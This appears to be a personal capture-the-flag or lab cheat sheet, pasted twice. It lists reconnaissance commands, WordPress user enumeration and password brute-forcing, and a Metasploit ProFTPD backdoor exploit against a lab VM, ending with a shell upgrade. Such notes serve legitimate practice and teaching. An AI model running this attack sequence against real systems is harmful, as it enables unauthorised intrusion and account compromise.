VM 1
find / -size 33c -user bandit7 -group bandit6 2>/dev/null --> find a file ...
https://github.com/zardus/ctf-tools --> IMP CTF tools
https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-haircut/
============ steps to follow ======================
netdiscover -r 192.168.239.9/24
nmap -sS -AT4 192.178.239.129 /OS and apps
nikto -host 192.168.239.129 / Find apache details
enum4linux 192.168.56.102 / get more details
dirb http://192.168.239.129 / search the web server
echo "192.168.239.129 vtcsec" >> /etc/hosts /Add the domain name to hosts to resolve IP address
/ new open the website http://vtcsec/secret/wp-admin/ --> login
wpscan -u http://192.168.239.129/secret/ --enumerate u /get username and pass
wpscan --url http://192.168.239.129/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2
searchsploit ProFTPD 1.3. //search for exploits
searchsploit OpenSSH 7.2p2
---------------------------------------------
Metasploit / Start Exploitation
---------------------------------------------
msfconsole
search ProFTPD 1.3.3c
use exploit/unix/ftp/proftpd_133c_backdoor
show options
set RHOST target_IP
expliot //sessions is opened
python -c 'import pty; pty.spawn("/bin/bash")' //get root access
find / -size 33c -user bandit7 -group bandit6 2>/dev/null --> find a file ...
https://github.com/zardus/ctf-tools --> IMP CTF tools
https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-haircut/
============ steps to follow ======================
netdiscover -r 192.168.239.9/24
nmap -sS -AT4 192.178.239.129 /OS and apps
nikto -host 192.168.239.129 / Find apache details
enum4linux 192.168.56.102 / get more details
dirb http://192.168.239.129 / search the web server
echo "192.168.239.129 vtcsec" >> /etc/hosts /Add the domain name to hosts to resolve IP address
/ new open the website http://vtcsec/secret/wp-admin/ --> login
wpscan -u http://192.168.239.129/secret/ --enumerate u /get username and pass
wpscan --url http://192.168.239.129/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2
searchsploit ProFTPD 1.3. //search for exploits
searchsploit OpenSSH 7.2p2
---------------------------------------------
Metasploit / Start Exploitation
---------------------------------------------
msfconsole
search ProFTPD 1.3.3c
use exploit/unix/ftp/proftpd_133c_backdoor
show options
set RHOST target_IP
expliot //sessions is opened
python -c 'import pty; pty.spawn("/bin/bash")' //get root access
Comments
Post a Comment